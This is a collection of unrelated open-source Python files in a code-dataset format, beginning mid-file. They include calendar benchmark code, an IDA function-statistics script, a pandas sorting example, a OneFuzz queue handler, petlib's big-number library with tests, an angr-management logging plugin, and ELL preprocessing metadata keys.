# Just create one event and re-use it for all samples.
f = _generous_sample
data = yield f(
dtrace, replacer, agent, host, port, user, calendar, fieldName,
attendeeCount, samples)
returnValue(data)
@inlineCallbacks
def _selfish_sample(dtrace, replacer, agent, host, port, user, calendar, fieldName, attendeeCount, samples):
url = 'http://%s:%s/calendars/__uids__/%s/%s/%s-change-%%d.ics' % (
host, port, user, calendar, fieldName)
headers = Headers({"content-type": ["text/calendar"]})
events = [
# The organizerSequence here (1) may need to be a parameter.
# See also the makeEvent call below.
(makeEvent(i, 1, attendeeCount), url % (i,))
for i in range(samples)]
for (event, url) in events:
yield agent.request('PUT', url, headers, StringProducer(event))
# Sample changing the event according to the replacer.
samples = yield sample(
dtrace, samples,
agent, (('PUT', url, headers, StringProducer(replacer(event, i)))
for i, (event, url)
in enumerate(events)).next,
NO_CONTENT)
returnValue(samples)
@inlineCallbacks
def _generous_sample(dtrace, replacer, agent, host, port, user, calendar, fieldName, attendeeCount, samples):
url = 'http://%s:%s/calendars/__uids__/%s/%s/%s-change.ics' % (
host, port, user, calendar, fieldName)
headers = Headers({"content-type": ["text/calendar"]})
# See the makeEvent call above.
event = makeEvent(0, 1, attendeeCount)
yield agent.request('PUT', url, headers, StringProducer(event))
# Sample changing the event according to the replacer.
samples = yield sample(
dtrace, samples,
agent, (('PUT', url, headers, StringProducer(replacer(event, i)))
for i in count(1)).next,
NO_CONTENT)
returnValue(samples)
|
taint_analysis/path_analysis.py | k-karakatsanis/BootStomp | 354 | 12653528 | from idc import *
from idaapi import *
from idautils import *
from re import *
class FuncInfo:
name = ''
addr = 0
size = 0
cond_stmt = 0
loop_stmt = 0
class PathAnalyze:
def __init__(self):
self.all_func_info = []
def write_function_info(self):
with open('function_info.txt', 'w') as finfo:
finfo.write("# method_name, method_addr, method_size, condition_stmt, loop_stmt\n\nbase_addr:\n0x%X\n\nfunctions:\n" % SegStart(MinEA()))
for func_info in self.all_func_info:
finfo.write(func_info.name + ", " + "0x%X" % func_info.addr + ", " + str(func_info.size) + ", " + str(func_info.cond_stmt) + ", " + str(func_info.loop_stmt) + "\n")
def count_condition_and_loop_stmt(self, func_info):
cond_stmt = 0
loop_stmt = 0
cond_pattern = compile("if")
loop_pattern = compile("for|while")
try:
func_decompiled = decompile(func_info.addr)
func_body = func_decompiled.__str__()
func_info.cond_stmt = len(cond_pattern.findall(func_body))
func_info.loop_stmt = len(loop_pattern.findall(func_body))
except DecompilationFailure as hf:
pass
def populate_function_info(self):
functions = Functions()
for function in functions:
func_info = FuncInfo()
func_info.name = get_func_name(function)
func_info.addr = function
func_info.size = function
print "Analyzing %s at 0x%X" % (func_info.name, func_info.addr)
func = get_func(function)
func_info.size = func.size()
self.count_condition_and_loop_stmt(func_info)
self.all_func_info.append(func_info)
if __name__ == '__main__':
path_analyze = PathAnalyze()
path_analyze.populate_function_info()
path_analyze.write_function_info()
print "Done!" |
Chapter11/c11_18_sort_pandas.py | John-ye666/Python-for-Finance-Second-Edition | 236 | 12653545 | # -*- coding: utf-8 -*-
"""
Name : c11_18_sort_pandas.py
Book : Python for Finance (2nd ed.)
Publisher: Packt Publishing Ltd.
Author : <NAME>
Date : 6/6/2017
email : <EMAIL>
<EMAIL>
"""
import pandas as pd
a = pd.DataFrame([[9,4],[9,2],[1,-1]],columns=['A','B'])
print(a)
# sort by A ascending, then B descending
b= a.sort_values(['A', 'B'], ascending=[1, 0])
print(b)
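# expected order (worked out by hand): the A=1 row first, then the A=9 rows with B descending (4 before 2)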
# sort by A and B, both ascending
c= a.sort_values(['A', 'B'], ascending=[1, 1])
print(c) |
src/api-service/__app__/queue_updates/__init__.py | tonybaloney/onefuzz | 2,692 | 12653550 |
#!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import json
import azure.functions as func
from ..onefuzzlib.updates import Update, execute_update
def main(msg: func.QueueMessage) -> None:
body = msg.get_body()
update = Update.parse_obj(json.loads(body))
execute_update(update)
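# Note (assumed from the signature): `msg` arrives via a storage-queue trigger declared in this
# function's function.json, one serialized Update per queue message.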
|
petlib/bn.py | SignorMercurio/petlib | 112 | 12653587 | from .bindings import _FFI, _C, get_errors
from functools import wraps
from copy import copy, deepcopy
from binascii import hexlify, unhexlify # pylint: disable=unused-import
# Py2/3 compatibility
try:
from builtins import int # pylint: disable=redefined-builtin
from builtins import object # pylint: disable=redefined-builtin
except BaseException: # pylint: disable=bare-except
print("Cannot mock for docs")
try:
from future.utils import python_2_unicode_compatible
except Exception as e: # pylint: disable=broad-except
# An identity decorator
def python_2_unicode_compatible(x): return x
import pytest
def force_Bn(n):
"""A decorator that coerces the nth input to be a Big Number"""
def convert_nth(f):
# pylint: disable=star-args
@wraps(f)
def new_f(*args, **kwargs):
new_args = args
try:
if not n < len(args) or args[n].bn: # isinstance(args[n], Bn):
new_args = args
except BaseException:
# if not n < len(args):
# new_args = args
if isinstance(args[n], int):
r = Bn.from_num(args[n])
new_args = list(args)
new_args[n] = r
new_args = tuple(new_args)
else:
return NotImplemented
return f(*new_args, **kwargs)
return new_f
return convert_nth
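# Usage sketch (illustrative): a dunder decorated with @force_Bn(1), e.g. __add__,
# gets its right-hand operand coerced, so `Bn(2) + 3` behaves like `Bn(2) + Bn(3)`.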
def _check(return_val):
"""Checks the return code of the C calls"""
if __debug__:
if isinstance(return_val, int) and return_val == 1:
return
if isinstance(return_val, bool) and return_val == True:
return
if return_val == True and return_val == 1:
return
errs = get_errors()
raise Exception("BN exception: %s" % errs)
class BnCtx(object):
""" A Bn Context for use by the petlib library """
__slots__ = ['bnctx', '_C']
def __init__(self):
self._C = _C
self.bnctx = self._C.BN_CTX_new()
_check(self.bnctx != _FFI.NULL)
def __del__(self):
if self.bnctx is not None:
self._C.BN_CTX_free(self.bnctx)
class BnCtxNULL(BnCtx):
""" A Bn Context for use by the petlib library """
__slots__ = ['bnctx', '_C']
def __init__(self):
self._C = _C
self.bnctx = _FFI.NULL
def __del__(self):
pass
import threading
_thread_local = threading.local()
def get_ctx():
global _thread_local
try:
return _thread_local.ctx
except BaseException:
_thread_local.ctx = BnCtx()
return _thread_local.ctx
@python_2_unicode_compatible
class Bn(object):
"""The core Big Number class.
It supports all comparisons (<, <=, ==, !=, >=, >),
arithmetic operations (+, -, %, /, divmod, pow)
and copy operations (copy and deep copy). The right-hand
side operand may be a small native python integer (<2^64). """
__C = _C
# We know this class will keep minimal state
__slots__ = ['bn']
# -- static methods
@staticmethod
def from_num(num):
if isinstance(num, int):
return Bn(num)
elif isinstance(num, Bn):
return num
else:
# raise TypeError("Cannot coerce %s into a BN." % num)
return NotImplemented
@staticmethod
def from_decimal(sdec):
"""Creates a Big Number from a decimal string.
Args:
sdec (string): numeric string possibly starting with minus.
See Also:
str() produces a decimal string from a big number.
Example:
>>> hundred = Bn.from_decimal("100")
>>> str(hundred)
'100'
"""
ptr = _FFI.new("BIGNUM **")
read_bytes = _C.BN_dec2bn(ptr, sdec.encode("utf8"))
if read_bytes != len(sdec):
raise Exception("BN Error")
ret = Bn()
_C.BN_copy(ret.bn, ptr[0])
_C.BN_clear_free(ptr[0])
return ret
@staticmethod
def from_hex(shex):
"""Creates a Big Number from a hexadecimal string.
Args:
shex (string): hex (0-F) string possibly starting with minus.
See Also:
hex() produces a hexadecimal representation of a big number.
Example:
>>> Bn.from_hex("FF")
255
"""
ptr = _FFI.new("BIGNUM **")
read_bytes = _C.BN_hex2bn(ptr, shex.encode("utf8"))
if read_bytes != len(shex):
raise Exception("BN Error")
ret = Bn()
_C.BN_copy(ret.bn, ptr[0])
_C.BN_clear_free(ptr[0])
return ret
@staticmethod
    def from_binary(sbin):
        """Creates a Big Number from a byte sequence representing the number in Big-endian 8-bit atoms (bytes). Only positive values can be represented as a byte sequence, and the library user should store the sign bit separately.
Args:
sbin (string): a byte sequence.
Example:
>>> byte_seq = unhexlify(b"010203")
>>> Bn.from_binary(byte_seq)
66051
>>> (1 * 256**2) + (2 * 256) + 3
66051
"""
ret = Bn()
_C.BN_bin2bn(sbin, len(sbin), ret.bn)
return ret
@staticmethod
def get_prime(bits, safe=1):
"""
Builds a prime Big Number of length bits.
Args:
bits (int) -- the number of bits.
safe (int) -- 1 for a safe prime, otherwise 0.
"""
_check(0 < bits < 10000)
_check(safe in [0, 1])
ret = Bn()
_check(
_C.BN_generate_prime_ex(
ret.bn,
bits,
safe,
_FFI.NULL,
_FFI.NULL,
_FFI.NULL))
return ret
## -- methods
_upper_bound = 2**(64 - 1)
def __init__(self, num=0):
'Allocate a Big Number structure, initialized with a small integer or zero.'
self.bn = _C.BN_new()
if num == 0:
return
if __debug__:
_check(0 <= abs(num) <= self._upper_bound)
_check(isinstance(num, int))
# Assign
if num != 0:
ret = _C.BN_set_word(self.bn, abs(num))
if __debug__:
_check(ret)
if ret != 1:
raise Exception("Bn Exception.")
if num < 0:
self._set_neg(1)
def _set_neg(self, sign=1):
# """Sets the sign to "-" (1) or "+" (0)"""
if not (sign == 0 or sign == 1):
raise Exception("Sign has to be 0 or 1.")
_C.BN_set_negative(self.bn, sign)
def copy(self):
"""Returns a copy of the Bn object."""
return self.__copy__()
def __copy__(self):
# 'Copies the big number. Support for copy module'
other = Bn()
_C.BN_copy(other.bn, self.bn)
return other
def __deepcopy__(self, memento):
# 'Deepcopy is the same as copy'
# pylint: disable=unused-argument
return self.__copy__()
def __del__(self):
# 'Deallocate all resources of the big number'
self.__C.BN_clear_free(self.bn)
def __inner_cmp__(self, other):
# 'Irel comparison function'
# if __debug__:
# _check( type(other) == Bn )
try:
sig = int(_C.BN_cmp(self.bn, other.bn))
return sig
except AttributeError:
return self.__inner_cmp__(Bn.from_num(other))
def __lt__(self, other):
return self.__inner_cmp__(other) < 0
def __le__(self, other):
return self.__inner_cmp__(other) <= 0
def __eq__(self, other):
if isinstance(other, int):
other = Bn(other)
if not isinstance(other, Bn):
return False
return self.__inner_cmp__(other) == 0
def __ne__(self, other):
return self.__inner_cmp__(other) != 0
def __gt__(self, other):
return self.__inner_cmp__(other) > 0
def __ge__(self, other):
return self.__inner_cmp__(other) >= 0
def bool(self):
'Turn Bn into boolean. False if zero, True otherwise.'
return self.__bool__()
def __bool__(self):
# 'Turn into boolean'
return not (self == Bn(0))
# Python 2 compatibility
def __nonzero__(self):
return self.__bool__()
# Export in different representations
def repr(self):
'The representation of the number as a decimal string'
return self.__repr__()
def __repr__(self):
# 'The representation of the number as a decimal string'
buf = _C.BN_bn2dec(self.bn)
s = bytes(_FFI.string(buf))
_C.OPENSSL_free(buf)
return s.decode('utf8')
def int(self):
"""A native python integer representation of the Big Number.
Synonym for int(bn).
"""
return self.__int__()
def __int__(self):
return int(self.__repr__())
def __index__(self):
return int(self.__repr__())
def hex(self):
"""The representation of the string in hexadecimal.
Synonym for hex(n)."""
return self.__hex__()
def __hex__(self):
# """The representation of the string in hexadecimal"""
buf = _C.BN_bn2hex(self.bn)
s = bytes(_FFI.string(buf))
_C.OPENSSL_free(buf)
return s.decode("utf8")
def binary(self):
"""Returns a byte sequence storing the absolute value of the Big
        Number in Big-Endian format (with 8 bit atoms). You need to extract the sign separately.
Example:
>>> bin = Bn(66051).binary()
>>> hexlify(bin) == b'010203'
True
"""
if self < 0:
raise Exception("Cannot represent negative numbers")
size = _C.bn_num_bytes(self.bn)
bin_string = _FFI.new("unsigned char[]", size)
l = _C.BN_bn2bin(self.bn, bin_string)
assert int(l) == size
return bytes(_FFI.buffer(bin_string)[:])
def random(self):
"""Returns a cryptographically strong random number 0 <= rnd < self.
Example:
>>> r = Bn(100).random()
>>> 0 <= r < 100
True
"""
rnd = Bn()
err = _C.BN_rand_range(rnd.bn, self.bn)
if __debug__:
_check(err)
return rnd
# ---------- Arithmetic --------------
def int_neg(self):
"""Returns the negative of this number. Synonym with -self.
Example:
>>> one100 = Bn(100)
>>> one100.int_neg()
-100
>>> -one100
-100
"""
return self.__neg__()
def int_add(self, other):
"""Returns the sum of this number with another. Synonym for self + other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> two100.int_add(one100) # Function syntax
300
>>> two100 + one100 # Operator syntax
300
"""
return self.__add__(other)
def __radd__(self, other):
return self.__add__(other)
def __add__(self, other):
try:
r = Bn()
err = _C.BN_add(r.bn, self.bn, other.bn)
if __debug__:
_check(err)
return r
except AttributeError:
return self.__add__(Bn.from_num(other))
def int_sub(self, other):
"""Returns the difference between this number and another.
Synonym for self - other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> two100.int_sub(one100) # Function syntax
100
>>> two100 - one100 # Operator syntax
100
"""
return self - other
def __rsub__(self, other):
return Bn(other) - self
def __sub__(self, other):
try:
r = Bn()
err = _C.BN_sub(r.bn, self.bn, other.bn)
if __debug__:
_check(err)
return r
except AttributeError:
return self.__sub__(Bn.from_num(other))
def int_mul(self, other):
"""Returns the product of this number with another.
Synonym for self * other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> one100.int_mul(two100) # Function syntax
20000
>>> one100 * two100 # Operator syntax
20000
"""
return self.__mul__(other)
def __rmul__(self, other):
return self.__mul__(other)
def __mul__(self, other):
try:
r = Bn()
local_ctx = get_ctx()
err = _C.BN_mul(r.bn, self.bn, other.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return r
except AttributeError:
other = Bn.from_num(other)
if other is NotImplemented:
return NotImplemented
return self.__mul__(other)
# ------------------ Mod arithmetic -------------------------
def mod_add(self, other, m):
"""
mod_add(other, m)
Returns the sum of self and other modulo m.
Example:
>>> Bn(10).mod_add(Bn(2), Bn(11)) # Only function notation available
1
"""
try:
r = Bn()
local_ctx = get_ctx()
err = _C.BN_mod_add(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return r
except AttributeError:
return self.mod_add(Bn.from_num(other), Bn.from_num(m))
def mod_sub(self, other, m):
"""
mod_sub(other, m)
Returns the difference of self and other modulo m.
Example:
>>> Bn(10).mod_sub(Bn(2), Bn(11)) # Only function notation available
8
"""
try:
r = Bn()
local_ctx = get_ctx()
err = _C.BN_mod_sub(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return r
except AttributeError:
return self.mod_sub(Bn.from_num(other), Bn.from_num(m))
def mod_mul(self, other, m):
"""
mod_mul(other, m)
Return the product of self and other modulo m.
Example:
>>> Bn(10).mod_mul(Bn(2), Bn(11)) # Only function notation available
9
"""
try:
r = Bn()
local_ctx = get_ctx()
err = _C.BN_mod_mul(r.bn, self.bn, other.bn, m.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return r
except AttributeError:
return self.mod_mul(Bn.from_num(other), Bn.from_num(m))
def mod_inverse(self, m):
"""
mod_inverse(m)
Compute the inverse mod m, such that self * res == 1 mod m.
Example:
>>> Bn(10).mod_inverse(m = Bn(11)) # Only function notation available
10
>>> Bn(10).mod_mul(Bn(10), m = Bn(11)) == Bn(1)
True
"""
try:
res = Bn()
local_ctx = get_ctx()
err = _C.BN_mod_inverse(res.bn, self.bn, m.bn, local_ctx.bnctx)
if err == _FFI.NULL:
errs = get_errors()
if errs == [50770023]:
raise Exception("No inverse")
elif errs == [50782316]:
raise Exception("No inverse")
else:
raise Exception("Unknown error: %s" % errs)
return res
except AttributeError:
return self.mod_inverse(Bn.from_num(m))
def mod_pow(self, other, m, ctx=None):
""" Performs the modular exponentiation of self ** other % m.
Example:
>>> one100 = Bn(100)
>>> one100.mod_pow(2, 3) # Modular exponentiation
1
"""
return self.__pow__(other, m, ctx=ctx)
def divmod(self, other):
"""Returns the integer division and remainder of this number by another.
Synonym for (div, mod) = divmod(self, other)"""
return self.__divmod__(other)
def __rdivmod__(self, other):
return Bn(other).__divmod__(self)
def __divmod__(self, other):
try:
dv = Bn()
rem = Bn()
local_ctx = get_ctx()
ret = _C.BN_div(dv.bn, rem.bn, self.bn, other.bn, local_ctx.bnctx)
if __debug__:
_check(ret)
return (dv, rem)
except AttributeError:
return self.__divmod__(Bn.from_num(other))
def int_div(self, other):
"""Returns the integer division of this number by another.
Synonym of self / other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> two100.int_div(one100) # Function syntax
2
>>> two100 / one100 # Operator syntax
2
"""
return self.__div__(other)
def __rdiv__(self, other):
return Bn(other).__div__(self)
def __div__(self, other):
dv, _ = divmod(self, other)
return dv
def mod(self, other):
"""Returns the remainder of this number modulo another.
Synonym for self % other.
Example:
>>> one100 = Bn(100)
>>> two100 = Bn(200)
>>> two100.mod(one100) # Function syntax
0
>>> two100 % one100 # Operator syntax
0
"""
return self.__mod__(other)
def __rmod__(self, other):
return Bn(other).__mod__(self)
def __mod__(self, other):
try:
rem = Bn()
local_ctx = get_ctx()
err = _C.BN_nnmod(rem.bn, self.bn, other.bn, local_ctx.bnctx)
if __debug__:
_check(err)
return rem
except AttributeError:
            return self.__mod__(Bn.from_num(other))
def __rtruediv__(self, other):
return Bn(other).__truediv__(self)
def __truediv__(self, other):
return self.__div__(other)
def __rfloordiv__(self, other):
return Bn(other).__floordiv__(self)
def __floordiv__(self, other):
return self.__div__(other)
def __rpow__(self, other):
return Bn(other).__pow__(self)
def pow(self, other, modulo=None, ctx=None):
"""Returns the number raised to the power other optionally modulo a third number.
Synonym with pow(self, other, modulo).
Example:
>>> one100 = Bn(100)
>>> one100.pow(2) # Function syntax
10000
>>> one100 ** 2 # Operator syntax
10000
>>> one100.pow(2, 3) # Modular exponentiation
1
"""
if modulo:
return self.__pow__(other, modulo, ctx)
else:
return self ** other
def __pow__(self, other, modulo=None, ctx=None):
try:
res = Bn()
if ctx is None:
ctx = BnCtx()
if modulo is None:
_check(_C.BN_exp(res.bn, self.bn, other.bn, ctx.bnctx))
else:
_check(
_C.BN_mod_exp(
res.bn,
self.bn,
other.bn,
modulo.bn,
ctx.bnctx))
return res
except BaseException:
other = Bn.from_num(other)
if modulo is not None:
modulo = Bn.from_num(modulo)
return self.__pow__(other, modulo, ctx)
def is_prime(self):
"""Returns True if the number is prime, with negligible prob. of error."""
res = int(_C.BN_is_prime_ex(self.bn, 0, get_ctx().bnctx, _FFI.NULL))
if res == 0:
return False
if res == 1:
return True
raise Exception("Primality test failure %s" % int(res))
def is_odd(self):
"""Returns True if the number is odd."""
return bool(_C.bn_is_odd(self.bn))
def is_bit_set(self, n):
"""Returns True if the nth bit is set"""
return int(_C.BN_is_bit_set(self.bn, n))
def num_bits(self):
"""Returns the number of bits representing this Big Number"""
return int(_C.BN_num_bits(self.bn))
# Implement negative
def __neg__(self):
# pylint: disable=protected-access
zero = Bn(0)
ret = copy(self)
if ret >= zero:
ret._set_neg(1)
else:
ret._set_neg(0)
return ret
def __hash__(self):
return int(self).__hash__()
    # Unsupported
# object.__lshift__(self, other)
# object.__rshift__(self, other)
# object.__and__(self, other)
# object.__xor__(self, other)
# object.__or__(self, other)
# ---------- Tests ------------
def test_bn_constructors():
assert Bn.from_decimal("100") == 100
assert Bn.from_decimal("-100") == -100
with pytest.raises(Exception) as excinfo:
Bn.from_decimal("100ABC")
assert 'BN Error' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
Bn.from_hex("100ABCZ")
assert 'BN Error' in str(excinfo.value)
assert Bn.from_hex(Bn(-100).hex()) == -100
assert Bn(15).hex() == Bn(15).hex()
with pytest.raises(Exception) as excinfo:
Bn(-100).binary()
assert 'negative' in str(excinfo.value)
#assert Bn.from_binary(Bn(-100).binary()) == 100
assert Bn.from_binary(Bn(100).binary()) == Bn(100)
assert Bn.from_binary(Bn(100).binary()) == 100
with pytest.raises(Exception) as excinfo:
s = 10**10
Bn(s)
assert 'does not fit' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
_check(False)
assert 'BN' in str(excinfo.value)
#assert Bn.from_binary(Bn(-100).binary()) != Bn(50)
assert int(Bn(-100)) == -100
assert repr(Bn(5)) == Bn(5).repr() == "5"
assert range(10)[Bn(4)] == 4
d = {Bn(5): 5, Bn(6): 6}
assert Bn(5) in d
def test_bn_prime():
p = Bn.get_prime(128)
assert p > Bn(0)
assert p.is_prime()
assert not Bn(16).is_prime()
assert p.num_bits() > 127
def test_bn_arithmetic():
assert (Bn(1) + Bn(1) == Bn(2))
assert (Bn(1).int_add(Bn(1)) == Bn(2))
assert (Bn(1) + 1 == Bn(2))
# assert (1 + Bn(1) == Bn(2))
assert (Bn(1) + Bn(-1) == Bn(0))
assert (Bn(10) + Bn(10) == Bn(20))
assert (Bn(-1) * Bn(-1) == Bn(1))
assert (Bn(-1).int_mul(Bn(-1)) == Bn(1))
assert (Bn(10) * Bn(10) == Bn(100))
assert (Bn(10) - Bn(10) == Bn(0))
assert (Bn(10) - Bn(100) == Bn(-90))
assert (Bn(10) + (-Bn(10)) == Bn(0))
s = -Bn(100)
assert (Bn(10) + s == Bn(-90))
assert (Bn(10) - (-Bn(10)) == Bn(20))
assert -Bn(-10) == 10
assert Bn(-10).int_neg() == 10
assert divmod(Bn(10), Bn(3)) == (Bn(3), Bn(1))
assert Bn(10).divmod(Bn(3)) == (Bn(3), Bn(1))
assert Bn(10) / Bn(3) == Bn(3)
assert Bn(10) // Bn(3) == Bn(3)
assert Bn(10).int_div(Bn(3)) == Bn(3)
assert Bn(10) % Bn(3) == Bn(1)
assert Bn(10).mod(Bn(3)) == Bn(1)
assert Bn(2) ** Bn(8) == Bn(2 ** 8)
assert pow(Bn(2), Bn(8), Bn(27)) == Bn(2 ** 8 % 27)
pow(Bn(10), Bn(10)).binary()
assert pow(Bn(2), 8, 27) == 2 ** 8 % 27
assert Bn(3).mod_inverse(16) == 11
with pytest.raises(Exception) as excinfo:
Bn(3).mod_inverse(0)
print("Got inverse")
assert 'No inverse' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
x = Bn(0).mod_inverse(Bn(13))
print("!!! Got inverse", x)
assert 'No inverse' in str(excinfo.value)
# with pytest.raises(Exception) as excinfo:
# x = Bn(0).mod_inverse(Bn(13))
# print("Got inverse", x)
#assert 'No inverse' in str(excinfo.value)
assert Bn(10).mod_add(10, 15) == (10 + 10) % 15
assert Bn(10).mod_sub(100, 15) == (10 - 100) % 15
assert Bn(10).mod_mul(10, 15) == (10 * 10) % 15
assert Bn(-1).bool()
def test_bn_right_arithmetic():
assert (1 + Bn(1) == Bn(2))
assert (-1 * Bn(-1) == Bn(1))
assert (10 * Bn(10) == Bn(100))
assert (10 - Bn(10) == Bn(0))
assert (10 - Bn(100) == Bn(-90))
assert (10 + (-Bn(10)) == Bn(0))
s = -Bn(100)
assert (10 + s == Bn(-90))
assert (10 - (-Bn(10)) == Bn(20))
assert divmod(10, Bn(3)) == (Bn(3), Bn(1))
assert 10 / Bn(3) == Bn(3)
assert 10 // Bn(3) == Bn(3)
assert 10 % Bn(3) == Bn(1)
assert 2 ** Bn(8) == Bn(2 ** 8)
assert 100 == Bn(100)
pow(10, Bn(10))
def test_bn_allocate():
# Test allocation
n0 = Bn(10)
assert True
assert str(Bn()) == "0"
assert str(Bn(1)) == "1"
assert str(Bn(-1)) == "-1"
assert Bn(15).hex() == "0F"
assert Bn(-15).hex() == "-0F"
assert int(Bn(5)) == 5
assert Bn(5).int() == 5
assert 0 <= Bn(15).random() < 15
# Test copy
o0 = copy(n0)
o1 = deepcopy(n0)
assert o0 == n0
assert o1 == n0
# Test nonzero
assert not Bn()
assert not Bn(0)
assert Bn(1)
assert Bn(100)
def test_bn_cmp():
assert Bn(1) < Bn(2)
assert Bn(1) <= Bn(2)
assert Bn(2) <= Bn(2)
assert Bn(2) == Bn(2)
assert not Bn(2) == None
assert Bn(2) <= Bn(3)
assert Bn(2) < Bn(3)
def test_extras():
two = Bn(2)
two2 = two.copy()
assert two == two2
def test_odd():
assert Bn(1).is_odd()
assert Bn(1).is_bit_set(0)
assert not Bn(1).is_bit_set(1)
assert Bn(3).is_odd()
assert Bn(3).is_bit_set(0)
assert Bn(3).is_bit_set(1)
assert not Bn(0).is_odd()
assert not Bn(2).is_odd()
assert Bn(100).is_bit_set(Bn(100).num_bits() - 1)
def test_check():
with pytest.raises(Exception) as excinfo:
_check(False)
assert 'BN' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
_check(-1)
assert 'BN' in str(excinfo.value)
with pytest.raises(Exception) as excinfo:
_check(0)
assert 'BN' in str(excinfo.value)
def test_timing_exp():
p = Bn.from_decimal("158261031819091141711717027498980088325079888681498417129323009913367867128038610210948802263526234270043507882496188624614467036250990588401775690578042934008692254417273606807265961724843618743242066301529332478013432957153823449143202719186309012133210922613102725038632605463022887306439116579645787938883")
psmall = Bn.from_decimal(
"90123082853250477832412338337738008391831682960497136029451532639902615425459")
xs = [p.random() for _ in range(1000)]
ys = [p.random() for _ in range(1000)]
import time
print
t0 = time.time()
X = [xi.mod_mul(yi, psmall) for (xi, yi) in zip(xs, ys)]
t1 = time.time()
print("Mod_mul time: %.2fms" % ((t1 - t0) * 1000.0 / 1000.0))
t0 = time.time()
X = [xi.pow(yi, p) for (xi, yi) in zip(xs, ys)]
t1 = time.time()
print(" Pow time: %.2fms" % ((t1 - t0) * 1000.0 / 1000.0))
ctx = BnCtx()
t0 = time.time()
X = [xi.pow(yi, p, ctx) for (xi, yi) in zip(xs, ys)]
t1 = time.time()
print("Pow ctx time: %.2fms" % ((t1 - t0) * 1000.0 / 1000.0))
|
angrmanagement/plugins/log_reverse_engineering/log_reverse_engineering_plugin.py | DennyDai/angr-management | 474 | 12653596 | <reponame>DennyDai/angr-management
from angrmanagement.config import Conf
from typing import Optional
from ..base_plugin import BasePlugin
try:
from slacrs import Slacrs
from slacrs.model import VariableRename, FunctionRename, ReverseEngineeringProgress
except ImportError as ex:
Slacrs = None # type: Optional[type]
VariableRename = None # type: Optional[type]
FunctionRename = None # type: Optional[type]
ReverseEngineeringProgress = None # type: Optional[type]
class LogReverseEngineeringPlugin(BasePlugin):
"""
Plugin for logging the reverse engineering of a program
"""
def __init__(self, workspace):
if not Slacrs:
raise Exception(
"Please install Slacrs to Initialize LogReverseEngineering Plugin"
)
super().__init__(workspace)
self.session = Slacrs(database=Conf.checrs_backend_str).session()
self.project = (
self.workspace.instance.img_name
if self.workspace.instance.img_name
else self.workspace.instance.project.filename
)
def handle_variable_rename(self, func, offset: int, old_name: str, new_name: str, type_: str, size: int):
"""
Logic to check if the same variable has already been renamed, if not add to the current session.
"""
if offset:
new_name = old_name
variable_rename = (
self.session.query(VariableRename)
.filter(
VariableRename.project == self.project,
VariableRename.function == func._name,
VariableRename.variable == old_name,
)
.first()
)
if variable_rename:
self.session.delete(variable_rename)
variable_rename = VariableRename()
variable_rename.project = self.project
variable_rename.function = func._name
variable_rename.variable = new_name
self.session.add(variable_rename)
#
def handle_function_rename(self, func, old_name: str, new_name: str):
"""
Logic to check if the same Function has already been renamed, if not add to the current session.
"""
function_rename = (
self.session.query(FunctionRename)
.filter(
FunctionRename.project == self.project,
FunctionRename.function == old_name,
)
.first()
)
if old_name.startswith("sub") or function_rename:
if function_rename:
self.session.delete(function_rename)
function_rename = FunctionRename()
function_rename.project = self.project
function_rename.function = new_name
self.update_function_name(old_name, new_name)
self.session.add(function_rename)
def handle_project_save(self, file_name: str):
"""
Commit the current session only when user saves the project, uncommitted session objects will be discarded
at teardown.
"""
variables_renamed_count = len(
self.session.query(VariableRename)
.filter(VariableRename.project == self.project)
.all()
)
total_variables_count = len(
self.workspace.instance.project.kb.variables.global_manager._variables
)
reverse_eng_progress = (
self.session.query(ReverseEngineeringProgress)
.filter(ReverseEngineeringProgress.project == self.project)
.first()
)
if not reverse_eng_progress:
reverse_eng_progress = ReverseEngineeringProgress()
self.session.add(reverse_eng_progress)
reverse_eng_progress.project = self.project
reverse_eng_progress.variables_renamed = variables_renamed_count
reverse_eng_progress.total_variables = total_variables_count
(
reverse_eng_progress.functions_renamed,
reverse_eng_progress.total_functions,
) = self.get_function_rename_stats()
self.session.commit()
def update_function_name(self, old_name, new_name):
"""
To update the function names for all variable_rename if function gets renamed.
"""
variables_renamed = self.session.query(VariableRename).filter(
VariableRename.project == self.project, VariableRename.function == old_name
)
for obj in variables_renamed:
obj.function = new_name
def get_function_rename_stats(self):
functions_renamed = [
func.function
for func in self.session.query(FunctionRename)
.filter(FunctionRename.project == self.project)
.all()
]
functions_renamed_count = 0
total_functions_count = 0
for key in self.workspace.instance.project.kb.functions._function_map:
if (
self.workspace.instance.project.kb.functions._function_map[key]._name
in functions_renamed
):
functions_renamed_count = functions_renamed_count + 1
total_functions_count = total_functions_count + 1
elif self.workspace.instance.project.kb.functions._function_map[
key
]._name.startswith("sub"):
total_functions_count = total_functions_count + 1
return [functions_renamed_count, total_functions_count]
def teardown(self):
self.session.close()
|
tools/utilities/pythonlibs/vision/add_image_preprocessing_metadata.py | awf/ELL | 2,094 | 12653598 | <reponame>awf/ELL<gh_stars>1000+
#!/usr/bin/env python3
###################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: add_image_preprocessing_metadata.py
# Authors: <NAME>
#
# Requires: Python 3.x
#
###################################################################################################
import argparse
import add_input_metadata
image_preprocessing_key_prefix = "model.input"
expected_color_channel_order_key = "{}.expectedColorChannelOrder".format(image_preprocessing_key_prefix)
expected_pixel_range_low_key = "{}.expectedPixelRangeLow".format(image_preprocessing_key_prefix)
expected_pixel_range_high_key = "{}.expectedPixelRangeHigh".format(image_preprocessing_key_prefix)
red_channel_mean_key = "{}.redChannelMean".format(image_preprocessing_key_prefix)
green_channel_mean_key = "{}.greenChannelMean".format(image_preprocessing_key_prefix)
blue_channel_mean_key = "{}.blueChannelMean".format(image_preprocessing_key_prefix)
red_channel_std_dev_key = "{}.redChannelStdDev".format(image_preprocessing_key_prefix)
green_channel_std_dev_key = "{}.greenChannelStdDev".format(image_preprocessing_key_prefix)
